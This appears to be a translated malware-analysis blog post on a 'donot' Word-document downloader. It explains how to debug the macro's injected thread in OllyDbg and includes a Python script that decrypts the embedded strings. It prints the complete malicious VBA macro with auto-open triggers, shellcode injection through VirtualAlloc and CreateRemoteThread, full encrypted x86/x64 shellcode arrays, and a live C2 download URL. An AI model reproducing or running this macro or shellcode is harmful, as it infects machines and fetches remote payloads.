Debugging the New Thread Created by Macro Code with OllyDbg

donot - fees_10_to_12-copy.doc - 7a6559ff13f2aecd89c64c1704a68588

Basic Information

File Name: fees_10_to_12-copy.doc
File Size: 46,119 Bytes
File Type: Downloader
MD5:       7a6559ff13f2aecd89c64c1704a68588

The sample is a .doc document carrying macro code. The document contains no decoy content, and the code portion is encrypted.

Sample Analysis

donot - fees_10_to_12-copy.doc

After extracting the macro code:

#If VBA7 Then
Private Declare PtrSafe Function JiJJJJLjIiLiliLl Lib "kernelbase" Alias "CreateRemoteThread" (ByVal Zopqva As LongPtr, ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr
Private Declare PtrSafe Function liljJjliiJIiiilL Lib "kernel32" Alias "VirtualAlloc" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr
Private Declare PtrSafe Function JlljIIIiILjliJJj Lib "kernel32" Alias "RtlMoveMemory" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr
#Else
Private Declare Function JiJJJJLjIiLiliLl Lib "kernelbase" Alias "CreateRemoteThread" (ByVal Zopqva As Long, ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long
Private Declare Function liljJjliiJIiiilL Lib "kernel32" Alias "VirtualAlloc" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long
Private Declare Function JlljIIIiILjliJJj Lib "kernel32" Alias "RtlMoveMemory" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long
#End If

Sub iIljILiiJILLlljL()
Dim jLlJLiiLjliLIIiL As Variant, ILlIjjlLJJJJlJIJ As Variant, IiJlLIlJIjIJJIiI As Variant, JlLiLJjLjiJlllIi As Long
#If VBA7 Then
Dim iIJIllLIliILJIll As LongPtr, jJjjJILLLJjijjjj As LongPtr, lljIJiiiIIjJjiIj As LongPtr
#Else
Dim iIJIllLIliILJIll As Long, jJjjJILLLJjijjjj As Long, lljIJiiiIIjJjiIj As Long
#End If

jLlJLiiLjliLIIiL = Array(137, 255, 85, 137, 229, 85, 131, 236, 64, 217, 235, 155, 217, 116, 36, 244, 93, 131, 237, 9, 141, 77, 37, 186, 188, 3, 0, 0, 246, 17, 128, 49, 253, 65, 74, 117, 247, 51, 203, 186, 50, 2, 2, 2, 102, 137, 54, 3, 137, 116, 14, 137, 116, 30, 137, 92, 10, 137, 124, 34, 137, 52, 130, 125, 12, 48, 119, 240, 139, 220, 235, 133, 2, 2, 2, 98, 139, 255, 139, 241, 84, 137, 113, 62, 137, 118, 28, 122, 3, 220, 84, 137, 116, 34, 3, 220, 51, 203, 75, 131, 119, 2, 209, 194, 175, 184, 67, 175, 3, 218, 84, 51, 244, 13, 188, 18, 58, 212, 118, 10, 195, 204, 5, 3, 212, 66, 233, 243, 59, 119, 2, 92, 119, 230, 88, 139, 221, 137, 88, 38, 3, 249, 100, 137, 14, 73, 137, 88, 30, 3, 249, 137, 6, 137, 3, 250, 139, 71, 2, 92, 129, 199, 6, 129, 127, 2, 2, 119, 167, 99, 193, 130, 58, 234, 118, 13, 130, 58, 235, 118, 8, 130, 58, 206, 118, 7, 130, 58, 233, 119, 19, 131, 122, 7, 146, 146, 146, 146, 118, 10, 139, _
253, 87, 139, 231, 143, 66, 7, 253, 226, 104, 2, 104, 2, 139, 229, 197, 5, 182, 155, 113, 166, 234, 106, 253, 253, 253, 104, 66, 106, 2, 50, 2, 2, 106, 2, 2, 82, 2, 104, 2, 253, 21, 129, 198, 10, 139, 197, 197, 69, 6, 227, 182, 62, 180, 197, 69, 10, 146, 124, 3, 99, 197, 69, 38, 53, 233, 59, 125, 197, 69, 34, 60, 109, 80, 12, 197, 69, 42, 61, 95, 240, 28, 197, 69, 26, 129, 23, 52, 115, 197, 69, 14, 66, 240, 75, 44, 197, 69, 18, 232, 32, 210, 59, 197, 69, 22, 21, 79, 176, 204, 197, 69, 30, 134, 164, 162, 71, 197, 69, 46, 128, 237, 13, 185, 197, 69, 50, 94, 48, 183, 217, 197, 69, 54, 74, 69, 36, 93, 197, 69, 58, 131, 60, 8, 98, 197, 69, 62, 127, 219, 196, 49, 197, 69, 66, 104, 181, 10, 187, 197, 69, 70, 99, 244, 160, 171, 197, 69, 74, 220, 177, 180, 69, 197, 5, 182, 155, 113, 166, 197, 69, 78, 158, 120, 242, 113, 197, 69, 82, 35, 243, 227, 141, 197, 69, 86, 168, 77, 99, 216, _
234, 183, 252, 253, 253, 234, 43, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 73, 103, 112, 108, 103, 110, 49, 48, 34, 68, 119, 108, 97, 118, 107, 109, 108, 113, 34, 80, 103, 113, 109, 110, 116, 103, 102, 2, 253, 85, 82, 106, 109, 108, 2, 2, 106, 119, 112, 110, 111, 143, 6, 38, 82, 253, 85, 6, 129, 198, 10, 139, 196, 197, 69, 98, 81, 20, 0, 34, 197, 69, 102, 161, 125, 107, 231, 85, 143, 125, 98, 234, 85, 252, 253, 253, 93, 234, 37, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 87, 112, 110, 111, 109, 108, 34, 68, 119, 108, 97, 118, 107, 109, 108, 113, 34, 80, 103, 113, 109, 110, 116, 103, 102, 2, 253, 85, 82, 51, 194, 143, 143, 99, 1, 2, 2, 143, 93, 110, 82, 82, 104, 125, 81, 83, 82, 253, 85, 102, 129, 250, 2, 13, 135, 246, 2, 2, 2, 234, 45, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 81, 103, 97, 109, 108, _
102, 34, 81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, 103, 34, 70, 109, 117, 108, 110, 109, 99, 102, 103, 102, 2, 253, 85, 82, 51, 194, 82, 104, 3, 104, 1, 82, 104, 3, 106, 2, 2, 2, 130, 81, 253, 85, 14, 82, 143, 157, 238, 2, 2, 2, 104, 2, 143, 22, 38, 104, 2, 80, 106, 2, 82, 2, 2, 81, 82, 253, 85, 70, 129, 198, 6, 90, 82, 253, 85, 30, 139, 220, 244, 20, 130, 52, 60, 68, 131, 60, 90, 137, 135, 59, 119, 240, 130, 57, 146, 118, 66, 130, 57, 206, 118, 57, 130, 57, 139, 118, 52, 234, 46, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 75, 108, 116, 99, 110, 107, 102, 34, 81, 103, 97, 109, 108, 102, 34, 81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, 103, 2, 253, 85, 82, 233, 54, 234, 40, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 84, 99, 110, 107, 102, 34, 81, 103, 97, 109, 108, 102, 34, _
81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, 103, 2, 253, 85, 82, 253, 225, 234, 31, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 71, 122, 107, 118, 107, 108, 101, 34, 86, 106, 112, 103, 99, 102, 44, 2, 253, 85, 82, 129, 198, 62, 95, 203, 193, 106, 118, 118, 114, 56, 45, 45, 97, 99, 97, 106, 103, 114, 99, 101, 103, 44, 107, 97, 119, 45, 115, 119, 103, 103, 108, 45, 82, 78, 73, 55, 119, 109, 116, 86, 115, 70, 114, 105, 64, 105, 69, 74, 108, 49, 52, 54, 111, 115, 101, 84, 67, 68, 59, 55, 50, 102, 106, 76, 44, 107, 97, 109, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2)
ILlIjjlLJJJJlJIJ = Array(144, 85, 72, 137, 229, 85, 72, 129, 236, 128, 0, 0, 0, 232, 0, 0, 0, 0, 93, 72, 131, 237, 18, 72, 141, 77, 47, 72, 199, 194, 76, 4, 0, 0, 246, 17, 128, 49, 253, 72, 255, 193, 72, 255, 202, 117, 243, 103, 78, 137, 6, 39, 98, 2, 2, 2, 79, 137, 66, 26, 79, 143, 98, 18, 79, 137, 6, 38, 254, 75, 137, 122, 98, 136, 69, 12, 62, 48, 118, 10, 79, 137, 2, 79, 59, 226, 119, 239, 75, 137, 114, 50, 233, 125, 83, 80, 81, 87, 84, 85, 74, 139, 255, 74, 139, 241, 84, 137, 113, 62, 137, 182, 28, 138, 2, 2, 2, 74, 3, 220, 84, 137, 116, 34, 74, 3, 220, 74, 51, 203, 74, 253, 203, 131, 119, 2, 209, 194, 175, 184, 253, 195, 175, 74, 3, 218, 84, 74, 51, 244, 13, 188, 18, 58, 212, 118, 8, 195, 204, 5, 3, 212, 74, 253, 194, 233, 237, 59, 119, 2, 92, 119, 221, 88, 74, 139, 221, 137, 88, 38, 74, 3, 249, 100, 137, 14, 73, 137, 88, 30, 74, 3, 249, 137, 6, 137, 74, 3, 250, 74, 139, _
71, 2, 92, 74, 129, 199, 10, 129, 127, 2, 2, 119, 147, 93, 92, 95, 89, 88, 91, 193, 104, 2, 104, 2, 74, 139, 229, 197, 5, 182, 155, 113, 166, 234, 109, 253, 253, 253, 74, 129, 238, 34, 74, 197, 195, 2, 2, 2, 2, 74, 197, 192, 2, 2, 82, 2, 75, 197, 194, 2, 50, 2, 2, 75, 197, 195, 66, 2, 2, 2, 253, 21, 74, 129, 198, 34, 74, 129, 198, 18, 74, 139, 197, 197, 5, 182, 155, 113, 166, 197, 69, 10, 227, 182, 62, 180, 197, 69, 18, 207, 102, 203, 87, 197, 69, 26, 66, 240, 75, 44, 197, 69, 34, 134, 164, 162, 71, 197, 69, 42, 94, 48, 183, 217, 197, 69, 50, 99, 244, 160, 171, 197, 69, 58, 35, 243, 227, 141, 234, 4, 253, 253, 253, 74, 137, 13, 74, 137, 93, 10, 74, 59, 219, 126, 7, 74, 43, 219, 233, 4, 74, 43, 219, 74, 245, 211, 74, 131, 251, 2, 50, 5, 2, 126, 110, 74, 51, 194, 74, 253, 194, 100, 131, 62, 1, 2, 193, 119, 247, 74, 129, 194, 6, 74, 137, 30, 1, 100, 129, 225, _
2, 104, 2, 74, 143, 6, 38, 74, 129, 238, 34, 74, 139, 219, 74, 197, 192, 2, 19, 2, 2, 75, 197, 194, 66, 2, 2, 2, 75, 139, 195, 253, 85, 18, 74, 129, 198, 34, 90, 197, 1, 2, 2, 2, 2, 104, 2, 74, 143, 6, 38, 74, 129, 238, 34, 74, 139, 219, 74, 197, 192, 2, 19, 2, 2, 75, 197, 194, 34, 2, 2, 2, 75, 139, 195, 253, 85, 18, 74, 129, 198, 34, 90, 74, 186, 119, 112, 110, 111, 109, 108, 2, 2, 82, 74, 143, 6, 38, 74, 129, 238, 34, 74, 139, 195, 253, 85, 10, 74, 129, 198, 34, 74, 129, 198, 10, 74, 139, 196, 197, 69, 74, 81, 20, 0, 34, 197, 69, 82, 161, 125, 107, 231, 85, 74, 143, 125, 74, 234, 60, 252, 253, 253, 93, 66, 130, 230, 242, 74, 143, 135, 249, 1, 2, 2, 74, 143, 93, 98, 74, 129, 238, 50, 74, 197, 195, 2, 2, 2, 2, 74, 139, 192, 75, 139, 218, 75, 197, 195, 125, 2, 2, 2, 74, 197, 70, 38, 34, 2, 2, 2, 2, 74, 197, 70, 38, 42, 2, 2, 2, _
2, 253, 85, 82, 74, 129, 198, 50, 74, 129, 250, 2, 13, 135, 132, 3, 2, 2, 74, 129, 238, 66, 74, 139, 219, 74, 184, 2, 2, 2, 130, 2, 2, 2, 2, 75, 197, 194, 3, 2, 2, 2, 75, 197, 195, 2, 2, 2, 2, 74, 197, 70, 38, 34, 1, 2, 2, 2, 74, 197, 70, 38, 42, 3, 2, 2, 2, 74, 197, 70, 38, 50, 2, 2, 2, 2, 253, 85, 26, 74, 129, 198, 66, 82, 74, 143, 157, 226, 2, 2, 2, 104, 2, 78, 143, 22, 38, 74, 129, 238, 50, 74, 139, 195, 74, 139, 216, 75, 197, 194, 2, 82, 2, 2, 79, 139, 211, 74, 197, 70, 38, 34, 2, 2, 2, 2, 253, 85, 50, 74, 129, 198, 50, 74, 129, 198, 10, 90, 74, 129, 238, 34, 74, 139, 195, 253, 85, 34, 74, 129, 198, 34, 66, 130, 230, 242, 74, 129, 238, 34, 233, 54, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 34, 122, 52, 54, 56, 34, 81, 103, 97, 109, 108, 102, 34, 81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, _
103, 34, 70, 109, 117, 108, 110, 109, 99, 102, 103, 102, 44, 2, 74, 143, 15, 199, 253, 253, 253, 253, 85, 58, 74, 129, 198, 34, 74, 139, 220, 244, 20, 130, 52, 60, 74, 253, 196, 131, 60, 90, 137, 135, 59, 119, 242, 130, 57, 146, 118, 86, 130, 57, 206, 118, 77, 130, 57, 74, 118, 72, 66, 130, 230, 242, 74, 129, 238, 34, 233, 50, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 34, 122, 52, 54, 56, 34, 75, 108, 116, 99, 110, 107, 102, 34, 81, 103, 97, 109, 108, 102, 34, 81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, 103, 2, 74, 143, 15, 203, 253, 253, 253, 253, 85, 58, 74, 129, 198, 34, 233, 74, 66, 130, 230, 242, 74, 129, 238, 34, 233, 44, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 34, 122, 52, 54, 56, 34, 84, 99, 110, 107, 102, 34, 81, 103, 97, 109, 108, 102, 34, 81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, 103, 2, 74, 143, 15, 201, 253, 253, 253, 253, _
85, 58, 74, 129, 198, 34, 253, 225, 74, 131, 198, 138, 2, 2, 2, 95, 203, 193, 106, 118, 118, 114, 56, 45, 45, 97, 99, 97, 106, 103, 114, 99, 101, 103, 44, 107, 97, 119, 45, 115, 119, 103, 103, 108, 45, 82, 78, 73, 55, 119, 109, 116, 86, 115, 70, 114, 105, 64, 105, 69, 74, 108, 49, 52, 54, 111, 115, 101, 84, 67, 68, 59, 55, 50, 102, 106, 76, 44, 114, 108, 101, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2)

#If Win64 Then
IiJlLIlJIjIJJIiI = ILlIjjlLJJJJlJIJ
#Else
IiJlLIlJIjIJJIiI = jLlJLiiLjliLIIiL
#End If

iIJIllLIliILJIll = liljJjliiJIiiilL(0, UBound(IiJlLIlJIjIJJIiI), &H1000, &H40)
For JlLiLJjLjiJlllIi = LBound(IiJlLIlJIjIJJIiI) To UBound(IiJlLIlJIjIJJIiI)
jJjjJILLLJjijjjj = IiJlLIlJIjIJJIiI(JlLiLJjLjiJlllIi)
lljIJiiiIIjJjiIj = JlljIIIiILjliJJj(iIJIllLIliILJIll + JlLiLJjLjiJlllIi, jJjjJILLLJjijjjj, 1)
Next JlLiLJjLjiJlllIi
lljIJiiiIIjJjiIj = JiJJJJLjIiLiliLl(-1, 0, 0, iIJIllLIliILJIll, 0, 0, 0) ' creates the new thread (handle -1 is the current process)

End Sub

Sub AutooPEN()
iIljILiiJILLlljL
End Sub
Sub WOrkBook_OPen()
iIljILiiJILLlljL
End Sub

Reading the macro code, the gist of the sample is this: hard-coded data is decrypted into a piece of shellcode, which is then executed by creating a new thread inside the process itself.

Set a breakpoint where the thread is created. "iIJIllLIliILJIll" holds the start address of the new thread's function; in this debugging session its value was "322371584", which is "1337 0000" in hex.

Once the thread is created, execution continues inside the new thread, which the debugger built into Office cannot follow. So: configure OllyDbg to ignore all exceptions, attach it to the "WINWORD.exe" process, go to the function address obtained above (the address the shellcode was written to), set EIP to the start of that code, and begin debugging.

New Thread

Decryption algorithm:

It decrypts the address of VirtualAlloc and calls it to allocate a block of memory, writes hard-coded data into that block, and then decrypts again to obtain the addresses of the functions it needs.

It then attempts to download a file from the C2 address "http://cachepage.icu/queen/PLK5uovTqDpkBkGHn364mqgVAF950dhN.ico".

As of the time of analysis, the downloaded file was no longer available.
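As an added example that is not part of the original post, the following Python script reproduces statically what the shellcode's own prologue does at runtime, so that the strings embedded in the hard-coded arrays (the stage marker and the download URL quoted above) can be recovered without attaching OllyDbg. It assumes, from the bytes at the start of each array, that the prologue's loop is "not byte [ecx]; xor byte [ecx], 0xFD" (bytes F6 11 80 31 FD) applied to every byte after the stub, with the region's offset and length taken from the preceding "lea" and "mov"; the byte excerpts embedded in the script are copied from the arrays above and are not the full payload.

```python
import re
import struct

# Excerpts copied from the two byte arrays in the macro above (not the full
# arrays): the decryption prologue of the x86 stub and of the x64 stub.
X86_STUB = bytes([137, 255, 85, 137, 229, 85, 131, 236, 64, 217, 235, 155, 217, 116, 36, 244, 93,
                  131, 237, 9, 141, 77, 37, 186, 188, 3, 0, 0, 246, 17, 128, 49, 253, 65, 74, 117, 247])
X64_STUB = bytes([144, 85, 72, 137, 229, 85, 72, 129, 236, 128, 0, 0, 0, 232, 0, 0, 0, 0, 93, 72, 131,
                  237, 18, 72, 141, 77, 47, 72, 199, 194, 76, 4, 0, 0, 246, 17, 128, 49, 253, 72, 255,
                  193, 72, 255, 202, 117, 243])
# Two encrypted runs copied from the x86 array: a status string and the C2 URL.
ENCRYPTED_RUNS = bytes([
    68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 73, 103, 112, 108, 103, 110, 49, 48,
    34, 68, 119, 108, 97, 118, 107, 109, 108, 113, 34, 80, 103, 113, 109, 110, 116, 103, 102, 2,
    106, 118, 118, 114, 56, 45, 45, 97, 99, 97, 106, 103, 114, 99, 101, 103, 44, 107, 97, 119, 45,
    115, 119, 103, 103, 108, 45, 82, 78, 73, 55, 119, 109, 116, 86, 115, 70, 114, 105, 64, 105, 69,
    74, 108, 49, 52, 54, 111, 115, 101, 84, 67, 68, 59, 55, 50, 102, 106, 76, 44, 107, 97, 109, 2])

# The loop in both stubs: lea ecx/rcx,[ebp+disp8]; mov edx/rdx,imm32;
# not byte [ecx]; xor byte [ecx],0xFD; inc; dec; jnz.  disp8 is the offset of
# the encrypted region from the start of the array, imm32 is its length.
LOOP_RE = re.compile(
    rb"\x48?\x8d\x4d(?P<disp>.)(?:\xba|\x48\xc7\xc2)(?P<len>.{4})\xf6\x11\x80\x31\xfd",
    re.DOTALL)

def parse_stub(blob):
    """Return (start, length) of the region the loop decrypts, or None."""
    m = LOOP_RE.search(blob)
    if m is None:
        return None
    return m.group("disp")[0], struct.unpack("<I", m.group("len"))[0]

def decrypt(data):
    """One loop iteration per byte: NOT then XOR 0xFD (together just XOR 0x02)."""
    return bytes(((~b) & 0xFF) ^ 0xFD for b in data)

def decode_array(blob):
    """Locate the loop in a full array and return the decrypted region."""
    found = parse_stub(blob)
    if found is None:
        return None
    start, length = found
    return decrypt(blob[start:start + length])

def extract_strings(data, min_len=6):
    """Printable ASCII runs, e.g. the stage markers and the download URL."""
    return [s.decode("ascii") for s in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]

if __name__ == "__main__":  # the x86 stub is exactly 37 bytes, so the runs follow it
    print(extract_strings(decode_array(X86_STUB + ENCRYPTED_RUNS)))
```

Pasting either complete array from the macro into bytes([...]) and passing it to decode_array yields the whole decrypted stage for string extraction.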

Author: Yenn_
Article link: https://0xdf1001f.github.io/2021/02/23/OD%E8%B0%83%E8%AF%95%E5%AE%8F%E4%BB%A3%E7%A0%81%E4%B8%AD%E7%9A%84%E6%96%B0%E7%BA%BF%E7%A8%8B/
Copyright notice: Unless otherwise stated, all articles on this blog are licensed under CC BY-NC-SA 4.0. Please credit Wei's Blog when reposting.
